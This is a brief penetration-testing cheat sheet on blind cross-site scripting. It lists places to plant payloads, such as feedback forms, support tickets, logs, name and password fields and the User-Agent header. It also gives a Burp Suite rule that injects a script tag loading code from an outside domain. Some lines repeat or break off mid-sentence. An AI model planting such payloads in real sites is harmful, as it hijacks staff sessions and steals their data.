Blind XSS
Where to find Blind XSS
Inside Burp Suite's match & replace function,in the match section put your
Where to find Blind XSS
- Contact / Feedback pages
- Surveys
- Your Password As Blind XSS Payload
- Chat applications / Forums
- Customer ticket applications
- Always use your name or description as Blind XSS Payload
- In the logs
- Add Blind XSS payload in the name field and reset your password
- Add Blind XSS payload while completing demos
- Add Blind XSS payload in the 'Need Expert" feature
- Add Blind XSS payload while upgrading your account
- Blind XSS Payload in User-Agent header
Inside Burp Suite's match & replace function,in the match section put your
- User-Agent's value and " "><script src=yourdomain></script> in the replace section